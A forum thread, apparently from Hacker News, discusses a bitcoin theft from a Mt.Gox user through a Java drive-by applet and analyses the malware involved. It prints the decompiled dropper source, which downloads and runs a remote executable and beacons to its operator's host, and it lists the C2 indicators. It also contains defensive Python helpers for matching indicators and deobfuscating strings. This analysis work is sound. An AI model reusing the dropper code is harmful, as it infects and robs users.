This kind of thing happens all the time with real banks, but with real banks, all transactions can be traced and reversed. Law enforcement can follow the required documentation to find the owner of any account on a global level. This is exactly what Bitcoin was created to avoid.
Well guess what? When you avoid the regulation, you take the safety of the currency into your own hands. MtGox should not refund this in any way shape or form. The problem was entirely his fault. He did not secure his MtGox account with available two-factor authentication. He ran untrusted code at full permission on his PC. He needs to take some responsibility for his own use of an unsecured currency on an unsecured website with unsecured authentication and running untrusted code.
Zero sympathy from me. Maybe it will be a wake up call to others to actually think about their decisions. Shouting about the 'nanny state' and using bitcoin, and then turning around and looking for a nanny to help him out when he goes around it is pathetic.
MtGox could help prevent this with something like Steam's approach, but once the user has run malicious code there is not much stopping that code from also compromising his email account. Two factor authentication would help here, and MtGox does appear to offer this - the complainer just didn't use it.
You don't really need the insurance of the bank and paper trails if you play it smart.
They should compensate me 100%.
This shows one of the fundamental problems with Bitcoin-related services: when people get taken advantage of, they expect to be compensated.
While in the real world, banks will often compensate you if you're the victim of fraud, there isn't any equivalent for Bitcoin, despite people really expecting it.
While I have sympathy for the author it was a pretty silly thing to do.
Agreed, the banks aren't doing it from the goodness of their heart.
While I have sympathy for the author it was a pretty silly thing to do.
And in the real world, if you gave someone your card and PIN, the bank would be unlikely to compensate you.
I think that this example is more similar to falling victim to card skimming, though.
Whilst one should always check the ATM for suspicious devices, and never let the card leave one's sight, it doesn't mean that it's not easy to fall prey to such fraud all the same.
From http://research.microsoft.com/apps/pubs/default.aspx?id=1618...
Of course, as that paper points out, the traditional electronic money system is incredibly reversible. If someone transfers $50,000 from my personal bank account to someone else's bank account, it's pretty easy for it to be undone.
The bottleneck is the money mules who are hired (read: suckered) into engaging in irreversible transactions.
He goes on to say, "First because their site is not secured against such rudimentary attacks as has been demonstrated today." I can't fathom how they're supposed to protect from users' computers being taken over. The only real way to do that is to have two-factor authentication... which they offer, and this guy did not use.
It sucks to get robbed, certainly. But blaming Mtgox for this is uncalled-for.
I don't like running Java on my computers even if they don't have access to $10,000 worth of bitcoins.
Actually from reading more, I don't understand if MtGox is involved at all. Did the executable just steal the wallet.dat file from his hard drive and have nothing to do with MtGox?
Creates the following directories:
%UserProfile%\537214
%UserProfile%\684544
%AppData%\dclogs
Creates a new registry value (so that it runs every time on startup) [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
537214 = "%UserProfile%\537214\svhost.exe"
Tries to connect to: tamere123.no-ip.org on ports 80 and 1604
The subdomain above leads to the following IP: 198.203.29.120
Which, according to iplocation.net is located in: Los Angeles
California
ISP: Hugeserver Networks Llc
It's very unusual for malware to be hosted in USA so I would assume that either it is a compromised computer/bot or it is some script kiddie using his home connection; the latter is more likely since there were no exploits used, just social engineering and luck.
File hashes:
MD5: 0x81F8E4C33ADECE6BF89EF171D9930282
SHA-1: 0xF540BA6C5F1C2AA50B81A440E7D74F8CF588B4D7
It's a service by script kiddies for script kiddies.
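To turn the indicators in the sandbox summary above (Run key, dropped directories, dynamic-DNS C2 host and ports, file hashes) into something a defender can actually run against host telemetry, here is an added example; it is not code from the thread or from any product. The indicator values are the ones posted above; the event records and their field names are constructed for the demo in a simplified Sysmon-like shape, and the "svhost.exe lookalike" rule is a heuristic of mine, not something the thread states.

```python
"""Match the indicators posted in the thread against constructed host telemetry."""
import re

# --- Indicators quoted from the thread's sandbox summary -------------------
RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE_NAME = "537214"
RUN_VALUE_DATA = r"%UserProfile%\537214\svhost.exe"
DROPPED_DIRS = (r"%UserProfile%\537214", r"%UserProfile%\684544", r"%AppData%\dclogs")
C2_HOST = "tamere123.no-ip.org"
C2_IP = "198.203.29.120"   # weaker indicator: a dynamic-DNS name can move at any time
C2_PORTS = {80, 1604}
KNOWN_HASHES = {
    "md5": "81f8e4c33adece6bf89ef171d9930282",
    "sha1": "f540ba6c5f1c2aa50b81a440e7d74f8cf588b4d7",
}


def _tail(indicator: str) -> str:
    """Strip a leading %Var%\\ so the indicator can be matched as a path suffix."""
    return re.sub(r"^%[^%]+%\\", "", indicator).lower()


def _path_matches(observed: str, indicator: str) -> bool:
    """True if the observed (already expanded) path ends with the indicator's variable-free tail."""
    obs = observed.replace("/", "\\").lower()
    return obs.endswith("\\" + _tail(indicator))


def match_event(event: dict) -> list:
    """Return the indicator hits for one telemetry event (empty list = nothing matched)."""
    hits = []
    kind = event.get("type")
    if kind == "registry_set":
        is_run_key = event["key"].lower() == RUN_KEY.lower()
        if (is_run_key and event["value_name"] == RUN_VALUE_NAME
                and _path_matches(event["data"], RUN_VALUE_DATA)):
            hits.append("Run key persistence matches reported value 537214 -> svhost.exe")
        elif is_run_key and event["data"].lower().endswith("\\svhost.exe"):
            # Heuristic (mine): 'svhost.exe' is a lookalike of the system binary svchost.exe
            hits.append("Run key launches an svchost.exe lookalike (svhost.exe)")
    elif kind == "dns_query":
        if event["query"].lower().rstrip(".") == C2_HOST:
            hits.append("DNS lookup of reported C2 hostname")
    elif kind == "net_connect":
        if event["host"].lower() in (C2_HOST, C2_IP) and event["port"] in C2_PORTS:
            hits.append("connection to reported C2 endpoint on port %d" % event["port"])
    elif kind == "file_create":
        for algo, digest in KNOWN_HASHES.items():
            if event.get(algo, "").lower() == digest:
                hits.append("%s matches reported sample hash" % algo.upper())
        path = event["path"]
        parent = path.replace("/", "\\").rsplit("\\", 1)[0]
        for d in DROPPED_DIRS:
            if _path_matches(path, d) or _path_matches(parent, d):
                hits.append("file activity in reported drop directory %s" % d)
    return hits


def scan(events) -> dict:
    """Map event index -> hits for every event that matched at least one indicator."""
    report = {}
    for i, e in enumerate(events):
        h = match_event(e)
        if h:
            report[i] = h
    return report


# Constructed sample telemetry (paths, user name and benign query are invented for the demo).
SAMPLE_EVENTS = [
    {"type": "registry_set", "key": RUN_KEY, "value_name": "537214",
     "data": r"C:\Users\alice\537214\svhost.exe"},
    {"type": "dns_query", "query": "tamere123.no-ip.org"},
    {"type": "net_connect", "host": "198.203.29.120", "port": 1604},
    {"type": "file_create", "path": r"C:\Users\alice\AppData\Roaming\dclogs\keys.dc"},
    {"type": "file_create", "path": r"C:\Users\alice\AppData\Roaming\dropped.exe",
     "md5": "81F8E4C33ADECE6BF89EF171D9930282"},
    {"type": "dns_query", "query": "update.example.com"},   # benign, should not match
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["type"], "->", "; ".join(reasons))
```

Hash and hostname matches are exact; the path matches deliberately ignore the `%UserProfile%`/`%AppData%` prefix because real telemetry carries expanded paths, and the IP match is kept separate from the hostname match because, as the comment above notes, the address behind a no-ip name may just be a compromised machine.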
I'm sorry for your loss but what happened is your own fault entirely and I would be surprised if MtGox decides to refund you.
1) You really shouldn't be running java applets unless you are certain you want to. I have had Java disabled for about a year and have only seen a page that required it once.
2) The domain name should've been a dead giveaway
3) Why would MtGox refund it? You got your money stolen by someone else. It's not MtGox's fault at all.
I agree that MtGox shouldn't be doing any kind of refunding in this case.
> what happened is your own fault entirely
You're blaming the victim.
If I'm walking down a dark alley and someone pulls a gun on me and takes my wallet, is it my fault because I decided to walk down a dark alley? Not at all.
The only person at fault here is the cracker who perpetrated the scam.
The only thing you can say about the victim in this case is that they aren't very sensible. Just like walking down dark alleys might not be sensible. But it's not the OP's fault that someone stole something from him.
+-------------------------------------------------------+
| SECURITY WARNING! |
| You are attempting to walk down a dark alley, |
| which could be dangerous. Only walk down |
| dark alleys you are familiar with and trust. |
| By walking down this alley you assume responsibility |
| for the attendant risks. |
| |
| Do you still wish to walk down the dark alley? |
| [x] Yes [ ] Cancel |
+-------------------------------------------------------+
Perhaps a better phrasing than "your own fault" is "it was 100% in his power to prevent this from happening. He is responsible for the fact that it happened."
Put it another way, if you lent your laptop to a friend, and they left it on the table like that and it was stolen, would you really find your friend blameless? Would you lend them a laptop again?
You could plug in the USB, hibernate, flip the switch and be Bitcoin banking within seconds. Then unhibernate and get on with whatever you were doing on your day-to-day OS.
That way it can be completely separate from whatever risky, dangerous and/or irresponsible things you do on a regular basis with your computer--things that seemingly are worth the risk as long as they don't directly give attackers access to thousands of $$$ digital cash.
Question, I'm making a rough guess that a realistic speed-optimized fast boot-time for a Linux OS that doesn't need to do much is in the order of five seconds, is that about right? Also, I'm not 100% sure if that hibernation trick is actually possible, I've never really seen it on multi-boot systems and I wonder why, but from what I understand about hibernation (RAM gets saved to HD, restored next boot) the components are there?
And, make it look unlike any other OS, to make users instantly aware if they're operating on their banking/money "inside the stick" or "out in the open" (on the regular OS). For instance, a glowy green CRT terminal filter.
> So, how about if you could have a Linux boot image onna stick, properly
> secured, no Java, several BitCoin apps preinstalled and optimized to boot
> extremely quickly into what would basically be a sort of BitCoin Wallet
> dashboard interface. You could plug in the USB, hibernate, flip the switch
> and be Bitcoin banking within seconds. Then unhibernate and get on with
> whatever you were doing on your day-to-day OS.
>
> That way it can be completely separate from whatever risky, dangerous and/or
> irresponsible things you do on a regular basis with your computer--things
> that seemingly are worth the risk as long as they don't directly give
> attackers access to thousands of $$$ digital cash.
Bitcoin: a currency for regular, everyday exchange.
Heh. But now I wonder how our banks do it.
Over here, and this is different than the credit cards you use in the US, you can log on to your bank account, and transfer money to anyone (within the EU, afaik) with no transaction costs (at least within the country, afaik). The same mechanism goes for online shopping. It's safe because it uses 2-factor authentication (you log on with a password, but need to get an SMS text with a special code to make transactions) and somehow people manage to not fuck this up and get hacked out of $8000--oh I'm sure it happened, but nobody's dumb enough to blame the currency/exchange system, there.
There are also sites that offer downloads of tar'd versions of the blockchain, or torrents. Pretty much anything is going to be faster than downloading via a bitcoin client.
You also get email (or dropbox or file download) backups that you can use in other Bitcoin clients in case something bad happens to blockchain.info.
It is possible, I've done it. If you're on a multi-boot system with Linux and Windows, you can freely hibernate either and boot into the other, as long as they completely don't touch each other. Neither can even mount the disk images of the other, let alone start changing things, or you face effectively-guaranteed corruption. Be careful with shared SD cards too. (I had it so Linux would never auto-mount those anyhow, so it was OK.)
The biggest objection I'd have to your plan is mostly that you'd also need some sort of backup plan, I don't think USB sticks are generally designed to store thousands of dollars' worth of stuff on them.
Also, while it may be a bit of a detour for your data, using DropBox you can at least work on the same files without too much hassle--although... you're going to get the "conflicted copy" stuff if you don't wait until everything is synced up. And if you have to wait, that defeats the purpose of having a seconds-quick OS-switch hibernating trick. How about if they share a local network drive?
> The biggest objection I'd have to your plan is mostly that you'd also need some sort of backup plan, I don't think USB sticks are generally designed to store thousands of dollars' worth of stuff on them.
Good point. How big is the "valuable" part of BCs data? As long as you don't need to work with it, you can store it anywhere, encrypted.
(https://lwn.net/Articles/299483/)
As for looks - desktop wallpaper with instructions and big red borders.
I can't imagine my parents (or 99% of the adult population) being liable for this theft when "proper security precautions" means knowing when to detect and avoid a "0 day java exploit with a cross site injection attack".
Why can't it be insured? Mt. gox or any other exchange could easily charge a premium for ensuring your bitcoins. If people wanted traceable currency they'd use a traceable currency.
The solution is probably some kind of secure hardware device/ecosystem run by a third party that the user trusts. The third party can then take legal responsibility for breaches of the hardware using existing market mechanisms.
Running bitcoin on general purpose hardware and software is a security nightmare for anyone who isn't a paranoid geek.
But this isn't a bug, it's a feature. Instant, uncancellable transactions. The problem is just that the feature is nowhere near ready for public use because there hasn't been time for an ecosystem of secure, easy-to-use transaction methods to evolve on top of it.
The problem with bitcoin isn't necessarily that it's too much like cash, but that people don't treat it enough like they would treat cash. Few people would put their cash in a robot that would hand it over blindly to anyone with the right password, but that's effectively what they're doing by holding bitcoins on an exchange like Mt.Gox.
Also, bank vaults are guarded, you can't shoot a bot and you can't dye-pack bitcoins.
<applet name='ChatBox' width='10' height='10' code='wDbIDcgeH.class' archive='wDbIDcgeH.jar'></applet>
Yep, probably an exploit, there aren't many good reasons for a 10x10 applet. Let's download the jar. It contains a single 3.5KB payload. Let's use a Java decompiler (JD-GUI).
import java.applet.Applet;
import java.applet.AppletContext;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.net.InetAddress;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.logging.Level;
import java.util.logging.Logger;
public class wDbIDcgeH extends Applet
{
static String lik = "h?t?t?p?:?/?/?w?w?w?.?g?a?l?a?x?y?j?d?b?.?c?o?m?";
public static void logme(String paramString)
{
String str1 = lik.replace("?", "");
String str2 = "PoutineCoutu";
try {
String str3 = InetAddress.getLocalHost().getHostName().replace(" ", "-");
URL localURL = new URL(str1 + "/insert.php?" + "&o=" + System.getProperty("os.name").replace(" ", "-") + "&u=" + str2 + "&ip=" + str3 + "&e=" + paramString);
localURL.openStream();
} catch (IOException localIOException) {
localIOException.printStackTrace();
}
}
public void start()
{
String str1 = "no";
String str2 = System.getenv("APPDATA");
String str3 = System.getProperty("java.io.tmpdir");
String str4 = "http://g2f.nl/0lczsoo";
String str5 = str2 + "\\";
String str6 = "AdobeUpdate-Setup1.84##e";
String str7 = "f.R.q.w.v.k.p.g.E.q.w.v.w";
String str8 = "CodedByOrpheu";
String str9 = str5.concat(str6.replace("##", ".ex"));
BufferedInputStream localBufferedInputStream = null;
try {
localBufferedInputStream = new BufferedInputStream(new URL(str4.replace("##", ".ex")).openStream());
} catch (IOException localIOException1) {
if (str1 != "yes") logme("Noa");
str1 = "yes";
Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException1);
}
FileOutputStream localFileOutputStream = null;
try {
localFileOutputStream = new FileOutputStream(str9);
} catch (FileNotFoundException localFileNotFoundException) {
Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localFileNotFoundException);
}
BufferedOutputStream localBufferedOutputStream = new BufferedOutputStream(localFileOutputStream, 1024);
byte[] arrayOfByte = new byte[1024];
try
{
int i;
for (long l = 0L; (i = localBufferedInputStream.read(arrayOfByte)) != -1; l += i)
localBufferedOutputStream.write(arrayOfByte, 0, i);
}
catch (IOException localIOException2) {
if (str1 != "yes") logme("Noc");
str1 = "yes";
Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException2);
}
try {
localBufferedOutputStream.close();
} catch (IOException localIOException3) {
Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException3);
}
try {
localBufferedInputStream.close();
} catch (IOException localIOException4) {
Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException4);
}
try {
Runtime.getRuntime().exec(str9);
logme("Yes");
} catch (IOException localIOException5) {
logme("Nod");
Logger.getLogger(wDbIDcgeH.class.getName()).log(Level.SEVERE, null, localIOException5);
}
try
{
getAppletContext().showDocument(new URL("0"), "_self");
} catch (MalformedURLException localMalformedURLException) {
System.exit(0);
localMalformedURLException.printStackTrace();
}
}
public void init() {
start();
}
}
Well, I can't decipher that, but some security expert might be able to see what's going on.
Now, the thing is, I don't think the forum user mentioned clicking anything. However, it's possible they've stolen the signature from something else, which that person has previously chosen to "Always Accept"? (I don't know if Java lets you do that)
Unless there is somewhere you can buy a java signature with bitcoins.
/insert.php?o=*os.name*&u=*APPDATA*&ip=java.io.tmpdir&e=*APPSTATE*
It appears to download an exe from http://g2f.nl/0lczsoo
Then it tries to execute the exe:
System.getenv("APPDATA") + "\\AdobeUpdate-Setup1.84.exe";
If at any point in the process it hits an exception, it sends the code for that exception to the galaxy web address, presumably so the dev can see how the app is performing.
Now normally it wouldn't be able to execute the exe (no access to the filesystem), but it looks like the applet requests elevated permissions from the user to allow it to access/run files.
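The two string tricks the decompiled applet relies on (the `?`-padded host that `logme()` unpacks with `replace("?", "")`, and the `##` placeholder that `replace("##", ".ex")` turns into an `.exe` name) are the kind of thing an analyst wants to undo mechanically rather than by eye. Here is an added triage helper for that; it is not code from the thread or from the malware author. The snippet it parses is a constructed excerpt that copies the relevant literals from the decompiled source posted earlier in the thread, and the regex and function names are my own.

```python
"""Recover the strings the applet hides with trivial transforms, for static triage."""
import re

# Constructed excerpt: the literals are copied from the decompiled applet above,
# the surrounding lines are trimmed so the example stays short.
DECOMPILED_SNIPPET = r'''
static String lik = "h?t?t?p?:?/?/?w?w?w?.?g?a?l?a?x?y?j?d?b?.?c?o?m?";
URL localURL = new URL(str1 + "/insert.php?" + "&e=" + paramString);
String str4 = "http://g2f.nl/0lczsoo";
String str6 = "AdobeUpdate-Setup1.84##e";
String str9 = str5.concat(str6.replace("##", ".ex"));
'''

# A literal made of at least four char-'?' pairs, e.g. "h?t?t?p?"; a lone trailing
# '?' as in "/insert.php?" is deliberately NOT matched.
SEPARATED = re.compile(r'"((?:[^"?]\?){4,}[^"?]?)"')
# Literals that still contain the "##" placeholder the applet patches at runtime.
SPLIT_EXT = re.compile(r'"([^"]*##[^"]*)"')
URL_RE = re.compile(r'https?://[^\s"\'+)]+')


def collapse_separated(text: str) -> str:
    """Undo the '?'-every-other-character padding, mirroring lik.replace("?", "")."""
    return SEPARATED.sub(lambda m: '"' + m.group(1).replace("?", "") + '"', text)


def complete_extension(literal: str) -> str:
    """Apply the applet's own replace("##", ".ex") to one literal."""
    return literal.replace("##", ".ex")


def extract_indicators(source: str) -> dict:
    """Return URLs and dropped executable names recoverable from decompiled source."""
    cleaned = collapse_separated(source)
    urls = []
    for u in URL_RE.findall(cleaned):
        if u not in urls:
            urls.append(u)
    dropped = []
    for lit in SPLIT_EXT.findall(source):
        name = complete_extension(lit)
        # The bare "##" argument becomes ".ex" and is filtered out here.
        if name.lower().endswith(".exe") and name not in dropped:
            dropped.append(name)
    return {"urls": urls, "dropped_files": dropped}


if __name__ == "__main__":
    found = extract_indicators(DECOMPILED_SNIPPET)
    print("URLs:         ", found["urls"])
    print("dropped files:", found["dropped_files"])
```

Run on the excerpt, it recovers the reporting host that `logme()` contacts, the payload download URL, and `AdobeUpdate-Setup1.84.exe`, which the source writes under `%APPDATA%`; those are exactly the values worth feeding into proxy and endpoint searches. The padded-literal regex requires several `char?` pairs so that ordinary query strings such as `"/insert.php?"` are left alone.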
>Paypal E-Mail:
>Hackforums Profile Link:
That means this is a service for script kiddies, they've sold this exploit as a service.
EDIT: Hackforums is basically a public internet forum where people openly discuss "hacking" and sell "hacking" tools. I've seen another example, a DDOS service, with an almost empty homepage but login and register actions.
(Why someone would be stupid enough to sell their product from the same domain it reports back to is beyond me, though. Especially since they put credits on it.)
EDIT 2: BINGO! http://www.hackforums.net/showthread.php?tid=3262851&hig... (the forum thread where the product is sold!)
Galaxy JDB is sort for "Galaxy Java Drive-By", apparently.
EDIT 3: Product image here, for people without hackforums accounts: http://i5.minus.com/iq2n2GtUjGHpW.png
Oh wow. "Noob friendly". "Free hosting". "Website Cloner". Only $40 for 6 months...
Here's a mention from 2011:
(http://answers.microsoft.com/en-us/windows/forum/windows_7-s...)
So, someone using an OS heavily targeted by malware decides not to use anti-malware software, and to have javascript and apparently java enabled in the browser, and then chooses to visit a URL advertised in a chat window - that URL is unknown to that person, does not match the URL they're on but claims a link to the URL they're on, etc etc.
It's a shame someone got robbed, and the responsibility is clearly on the criminal to not engage in criminal behaviour.
But come on; don't just give them your money.
EDIT: I just read the first answer to the MS post above. It's baffling.
> On reflection the best and easiest recourse might be to just tell AVG to "ignore" this "infection." Is this thing actually a virus? or an infection? I have seen no operational problems, nothing in chkdsk, sfc, Registry Mechanic, etc., to concern me.
Totally unrelated to MtGox but: someone has anti-malware software. That software tells them it's found an infected file. There's no evidence this is a false positive. Rather than wipe and re-install (a distressingly unpopular choice) or using anti-malware tools to clean the infection the advice is to train the software to ignore the infection.
MS is stuffed. There is nothing they can do to repair their malware reputation when the users are that stupid.
You can run the AutoIt3 script through Exe2Aut (an AutoIt decompiler) and you'll find a pretty mundane remote access toolkit which inserts itself into \Run, checks to see if it's running in a variety of virtualized environments, and, if it's not, can start one of a couple different remote control payloads. It looks like it's got a rudimentary Facebook credentials theft mechanism in its first stage as well.
This is a pretty common for-sale driveby script kiddie exploit - it's depressing how effective these still are.
Here it is cleaned up: http://pastebin.com/raw.php?i=neP9qXGM
Seems like yet another dropper, not the actual bad thing.
That's some dodgy java code right there. (You should use .equals() )
Decompile is irrelevant here, the only difference is 'str1' might have been named something different in the original code.
This is java code, so "string" != "string" will usually return true always, as you are checking if the objects are equal and not whether the contents are equal. Depending on the JRE this code runs on, it would give different output. [1]
[1] http://stackoverflow.com/questions/513832/how-do-i-compare-s...
http://www.hackforums.net/member.php?action=profile&uid=...
So let's look at their recent posts:
http://www.hackforums.net/search.php?action=results&sid=...
>RE: Bitcoin prices collapse over $100 in a matter of hours
http://www.hackforums.net/showthread.php?tid=3398170&pid...
>RE: Buying 10+ BTC via Bank Transfer / Western Union
http://www.hackforums.net/showthread.php?tid=3392974&pid...
So this person knows what Bitcoin is and has some to sell.
Hmm, let's look much further back in their history.
> RE: Ψ #1 [SILENT JAVA DRIVE BY] FoxxyJava [0/37]★ FREE HOSTING ★ SPREAD FASTER! ★ [$20] Ψ
>Vouch for this amazing jdb. Keep good work. He is ALWAYS disponible for his clients. He helped me alot.
http://www.hackforums.net/showthread.php?tid=3005399&pid...
FoxyJava is a Java Drive-By, similar to this GalaxyJDB the exploit used. I wonder if he has also used GalaxyJDB? I can't see any replies, but it's possible. Let's go to the galaxyjdb site and see if the person who programmed the login was dumb enough to check username and password separately: http://galaxyjdb.com/index.php?a=Login
...sadly not, it would seem. So I can't prove they use GalaxyJDB, or that this is even the person we're after, but I think it's very likely.
String str2 = System.getenv("APPDATA");
String str5 = str2 + "\\";
String str6 = "AdobeUpdate-Setup1.84##e";
String str9 = str5.concat(str6.replace("##", ".ex"));
Runtime.getRuntime().exec(str9);
Why this works is beyond me, but that looks like the actual call to execute it.
"Being a techie", I like to confuse Java and Javascript ...
However, the guy just got hacked out of about $8k worth of BC, which sucks, and for that I do give him a pass :)
Java's security track is horrible and it's quite popular target.
To me if you have to download the .jar and run it then that is no different to downloading an executable and running it and should take the appropriate precautions as you would with executables.
There are plenty of legitimate Java applications out there that are used by a wide spectrum of people from gamers (minecraft) to enterprise developers (JavaEE, java application servers, etc.).
But stopping the chance of having everything in your digital (and in the case of money, personal) life stolen because you clicked on a link FAR outweighs the benefit of playing minecraft imo.
What's a terrible idea is letting it run in your browser. Ever.
Java's security track has been pretty good. In this case it's a signed applet that asked the user for permission to run. It's a classic case of social engineering.
It would be the same if an executable is directly downloaded and prompted for running. If you haven't got rid of all your executables on you computer, you probably will fall into the same trap.
When I hear interviews where people (bitcoin founder) suggest that you don't transfer into bitcoins any state currency you aren't willing to lose... it sort of peels the "inflation-hedge" covers off the whole thing. How unstable and unsecure does a currency have to be to be nearly worthless? USDollars look pretty safe again.
This is so much a game of hacker gambling. A great experiment. Too bad it consumes so much productive time and energy.
The beautiful narrative of the reclusive, open-society, eastern hacker that designs this thing which grows to be the godzilla it is... The story arc on bitcoin is borderline trite. Michael Bay is all over this in a year.
>Then and there someone posted a link to www mtgox-chat info (do not open unless you know what >you are doing) claiming a video announcement that mtgox was going to start trading litecoins. >I clicked on the link, the website opened, not much happened, and the "video"/chatbox never loaded. >I then forgot about this website.
If he got a trojan on a third party site that compromised his computer and Mt. Gox's site had nothing to do with it, this title seems a bit libelous. If in fact that's the case, I'd implore HN mods to change the title to something that doesn't unfairly cast aspersions on the Mt.Gox site.
FWIW: I have no bitcoins, I don't fully grok bitcoins, I'm scared of bitcoins, I don't use mt.gox or any vendor
This was someone on a vulnerable OS, running without malware protection, with Java active in the browser, visiting an unknown link, and possibly giving an application permission to run. (Although maybe it didn't need permission to run?)
To get to that point the person needed to ignore several well established security principles.
Sure, the user was being stupid here, but MtGox didn't do them any favors either.
I'm not familiar with Mt Gox but it's unacceptable if they don't have two factor authentication.
EDIT: Scrolling down, it appears they DO offer two-factor authentication. nvm.
Java is just such a big target for hackers nowadays, that there will always be zero-days.
Some banks solve this problem by requiring a 2 factor auth to confirm transactions (even after logging in).
The value of hacking, phishing, etc is significantly increased by the presence of bitcoins.
I guess you could argue that if bitcoins are popular, software practices will evolve to be much more secure - but until then, it's wild west, and much more wild than the internet ever was before.
"Decentralised crime fighting using private set intersection protocols" - Mike Hearn
Which means it comes down to convincing the gatekeeper that you were burgled. But that's a human level problem.
The guy had a Trojan loaded up onto his computer where he stored his bitcoins. All this two-factor authentication stuff people are talking about is for naught. He was attacked by a virus, and that virus stole bitcoins straight off of his computer.
This should change (at the glacial rate banks change things) as they realise that Java in the browser is risky business.
This may change if Oracle pull their finger out, stop being dicks about the licensing, and try to promote the language again.
Honestly, I think they've left it too late and the majority of "Java" you're going to see in the near future is going to be related to Android (and hence not running on Oracle's stack).
Only a signed Java applet can ask the user to give permission to access his computer.
Looks like this was entirely his own fault, though it still sucks. Wouldn't hope for a refund though t.b.h.
At least they were open about being robbed. I wonder how many bitcoins were stolen in total?
EDIT: Has anyone visited the URL to analyse the malware?
AFAIU, the user was prompted to accept an autosigned applet, and he did so. After that, the outcome was inevitable. You may hate java all you like, but it seems like the user (inadvertently) gave this program permission to steal all his money.
A Mt. Gox investor was surprised to see his account suddenly pillaged. Will Bitcoin theft call into question trust and confidence in the system?
Stop storing your wallet online. And if not that, stop letting flash/java autoload/run. Both Chrome and Firefox have "click-to-enable". Not only is it more secure, it also prevents auto-video-playing, background audio you can't find and shit like this from happening.